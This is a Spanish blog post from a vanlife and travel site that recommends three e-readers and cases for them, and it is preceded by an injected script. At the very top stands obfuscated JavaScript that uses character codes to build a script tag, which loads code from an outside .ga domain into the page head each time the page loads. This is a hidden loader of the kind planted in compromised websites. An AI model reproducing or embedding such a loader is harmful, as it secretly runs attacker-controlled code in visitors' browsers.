Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); No puedo vivir sin ti, No hay manera... - Furgoplan
No puedo vivir sin ti, No hay manera…

No puedo vivir sin ti, No hay manera…

Este post no trata de personas. Ni de amor. Trata de objetos que nos acompañan, que pueden reemplazarse si se rompen, pierden… por mucho cariño que le tengas. Las personas no se reemplazan, ni si quiera las más insoportables y desagradables.

Así que hoy voy a contar un secreto. En su día fue un gran descubrimiento, aunque al principio renegué del mismo.

Y además, al final del post, estrenaremos sección.

*Recuerda que para ver los dispositivos y accesorios solo tienes que pinchar en las palabras en color verde*


No puedo vivir sin él. Me lo llevo a todas partes. Antes de dormir, en transporte público, después de comer… No puedo vivir sin él, no hay manera.

Hay muchas cosas que me gusta meter en mi bolso o mochila, ya sea grande o pequeña, pero la mayoría de ellas suelen ser prescindibles y varían un montón.

Con esto sin embargo… Yo lo tengo super claro. Viene conmigo a todas partes. 

Mi libro electrónico.

Lo tengo que reconocer… yo antes era muy anti-libro electrónico. Me gusta el olor y la textura del papel, leer con una luz baja, pasar las hojas, los marca páginas… Y aunque eso no ha cambiado y (ahora que estoy en casa) suelo combinar lecturas de ambos tipos… la verdad es que, la practicidad del libro electrónico es… difícilmente superable.

Hace años, viajaba cargada con un cuaderno (o dos) para escribir mis cosillas y para usarlos en plan agenda (incluso como carpeta para papeles o tickets de todo tipo). Y, además, metía en la mochila un libro o dos de lectura y la guía de viaje del país al que me dirigia. ¿Sabes lo que supone eso en una mochila? Peso, espacio y… muchas veces tienes que renunciar a meterlos en el equipaje de mano precisamente por esos motivos.

A pesar de renegar durante un tiempo… al final caí rendida ante todas sus comodidades. Ligero, compacto y con infinidad de espacio para llevar todos los libros que se te ocurran. Además, los dos últimos que he tenido (el año pasado me robaron el que tenía) tienen wi fi y la pantalla se ilumina. La batería dura… ni lo sé en verdad, probablemente un mes (y lo uso entre una y tres horas cada día), y se carga por micro USB – esto puede cambiar en función del modelo y de que las cosas se van actualizando. Eso… y otras muchas funciones (los hay que incluso traen sudokus).

El primero que tuve fue de la marca BQ y fue un regalo que me dejó flipada, todo un acierto. Aunque al principio me costaba imaginarme leyendo en él…

Acabé perdiéndolo en una de mis mil mudanzas y me había acostumbrado tanto a usarlo que acabé dejándome los ojos leyendo libros completos en el portátil o en el móvil. No lo hagas. Esas pantallas no están preparadas para este uso, te dolerá la cabeza, se te cansará la vista y acabarás sintiéndote cansado/a o encontrándote hasta mal.

Al viajar en la furgo tengo una pequeña estantería en la que meter libros, aunque para un viaje largo (como el que hicimos a Suiza) insuficiente. Puedo leer varios libros al mes (a veces tres o cuatro), además de llevar manuales de fotografía, guías de viaje o libros de cocina o idiomas. En una estantería de 40cm de largo… no da para todo. Por eso, el libro electrónico era mi solución. Además si eres de comprar los libros, los electrónicos suelen ser más baratos que los libros de papel. Aunque, no te ofrecen esa mágica visita a la librería de tu pueblo o barrio.

Viajando de mochilera, me pasa lo que he contado antes. Podría cargar la mochila con un par de libros y cuadernos. Además, a riesgo de no usar uno de ellos y cargar inútilmente con su peso y volumen.


Hacía tiempo que me apetecía compartir las bondades de uno de mis accesorios favoritos para viajar. No quisiera que parezca que hago desprecio a los libros de toda la vida. ¡Para nada!. Me encantan. Pero el libro electrónico me parece más práctico si te mueves de aquí para allí (yo en los últimos años, además de los viajecillos, me he mudado muchas veces y una de las cosas que más cuesta mover son los tropecientos libros y cuadernos que tengo). También es muy práctico si no dispones de mucho espacio para guardar libros de toda la vida. Y aunque la inversión inicial es mayor que la de cualquier otro libro, a la larga te sale rentable.

Estos son los tres que yo he tenido, y que por eso te voy a recomendar. Siempre que elijas uno, piensa en tus necesidades, no te vayas al más caro por que a lo mejor luego no le das uso y es un gasto innecesario. Además te añado unos accesorios para que protejas tu e-reader (así se denomina en inglés el libro electrónico) y lo salves de golpes y arañazos.


BQ Cervantes 4   Es el hijo pequeño del primero que yo tuve y con el que estaba la mar de contenta. La batería dura mucho (1500 mAh), tiene 8gb de memoria interna (que es mucho para este tipo de dispositivos) y además tiene una ranura compatible con micro SD de hasta 32Gb. Es compatible con muchísimos tipos de archivos e incluye diccionarios de: Español, Inglés, Francés, Portugués, Alemán, Italiano, Euskera, Catalán, Gallego. Ósea que si te apetece leerte un libro en inglés y no sabes lo que significa una palabra, no hace falta que la busques (el propio dispositivo tiene el diccionario integrado, así que señalando la propia palabra te la traduce). Además de la luz integrada, esta tiene una variedad de «luz cálida» para cuando leas en la cama. Es una muy buena opción con un precio muy competitivo.

Accesorios:

Funda de colores

Cristal templado


 El siguiente que tuve fue un Kindle paper white que es la versión de Amazon, con la opción de memoria (interna) de entre 8 y 32gb. En mi opinión, los 8gb dan de sobra. Por supuesto, también dispone de wi fi, diccionarios integrados, es resistente al agua (nunca se sabe lo que puede pasar), su luz puede regularse en 16 intensidades… Tiene la colección de fundas más chula del mercado (variedad de modelos y precios) y un gran inconveniente: cualquier formato no es valido para este e-reader (libro electrónico). Solo abre los archivos con terminación «.mobi» y aunque estos no están disponibles en multitud de plataformas, simplemente tienes que descargarte un programa que te modifica cualquier tipo de archivo y lo convierte a este formato. Piensa que este puede ser un gran impedimento, y más teniendo en cuenta que por un precio similar tienes el BQ que ofrece similares prestaciones y no tiene esta limitación. Auuuunque… en amazon piensan en todo y hay un modelo a un precio mucho más competitivo (con menos prestaciones: la luz LED tiene 4 puntos de iluminación en lugar de 5, la memoria interna es de 4gb en lugar de 8… no deja de ser un muy buen aparato) que te dejo a través del siguiente enlace: Kindle.

Aquí te dejo algunas de las fundas que más me gustan para el Kindle paper white:

Funda mapa mundi esta es la que yo tenía. Al abrirla y cerrarla el libro se enciende y se apaga. Si el mapa mundi no es lo tuyo, hay otros muchos modelos.

Funda negra básica esta se dobla de tal manera que puede mantener el libro en posición vertical sin necesidad de que tú lo sujetes.

No puedo dejar de mostrarte la funda de la noche estrellada, por que me chifla, por que estuve muy cerca de comprármela y por que es preciosa (y muy práctica)


Por último te voy a hablar del Energy Pro 4 libro electrónico que tengo ahora y que funciona muy bien pero… es el que menos me gusta de los que he tenido. Voy a empezar por lo malo y después contaré sus virtudes. La luz mínima es bastante más intensa que la luz media del Kindle, y no tiene nada que ver con la luz cálida del BQ. Teniendo en cuenta que yo lo uso sobre todo antes de dormir… al principio me resultó incomodo, aunque ahora ya no es ningún problema, me acabé acostumbrando. No tiene diccionarios integrados y aunque lo he intentado, yo no he conseguido meterle ninguno y que funcione (por lo que leer en inglés es más rollo). La pantalla táctil no es tan precisa (ni de lejos) como las de los otros dos (a veces me resulta difícil llegar al menú del libro). Y, lo que menos me gusta de todo, es muy lento en comparación al de amazon y al BQ. Al encenderse tarda hasta llegar a la pantalla de inicio, después tienes que entrar en el libro (se tiene que cargar) y a veces se queda atascado. Lo bueno: para compensar el táctil tiene botones de los de toda la vida, en su memoria interna tienes libros en 7 idiomas diferentes (y no uno ni dos, 1500 libros de regalo… y todavía te queda prácticamente toda la memoria interna libre). Su memoria interna es igual a las de los dos anteriores (8gb) aunque es compatible con micro Usb superiores al BQ (el BQ solo admite micro Usb de hasta 32 GB y este de 128Gb, que en ambos casos es muchísimo). También hay una gran variedad de fundas con las que protegerlo.

Fundas:

Funda mapa mundi. Me recuerda mucho a mi funda anterior pero esta además tiene goma elástica para que se mantenga cerrado.

Funda con el reloj astrónomico de Praga. Me parece chulísima, y más si tienes recuerdos de esa ciudad o ganas de concerla.

Además si ya tienes tu libro electrónico y estas buscando una funda universal que se adapte a tu modelo, aquí te dejo algunas perfectas para libros electrónicos de 6″

Funda de cáñamo natural

Funda diferentes diseños

Funda imitación a libro de piel

Y si, a pesar de todo, sigues prefiriendo los libros convencionales, no dejes de leer en ningún sitio utilizando esta pequeña lamparita que se adapta perfectamente a cualquier libro. Además tiene distintos tipo de luz para que se adapte a tus gustos. Yo la he probado y me parece un inventazo.


Para terminar…

Hace tiempo que me apetecía estrenar una nueva sección en la web que me motiva y me hace mucha ilusión. Y es que, me encantaría compartir por aquí todos aquellos libros que estoy leyendo y que me están gustando más. Ya sea por viajes, por que conectan con algo que tengo dentro o por que me enseñan grandes lecciones. Así que… doy por estrenada la sección ¡más libros (más libres)!

Pronto comenzaré a publicar reseñas de libros que me han hecho pensar, viajar, empatizar, reír o llorar. ¡Y os dejaré enlaces tanto a su versión electrónica como a la versión física de los mismos!

Y tu…

¿Hay algo sin lo que no puedas vivir? ¿Que te llevas a todas partes?

Este portátil

Los comentarios están cerrados
A %d blogueros les gusta esto: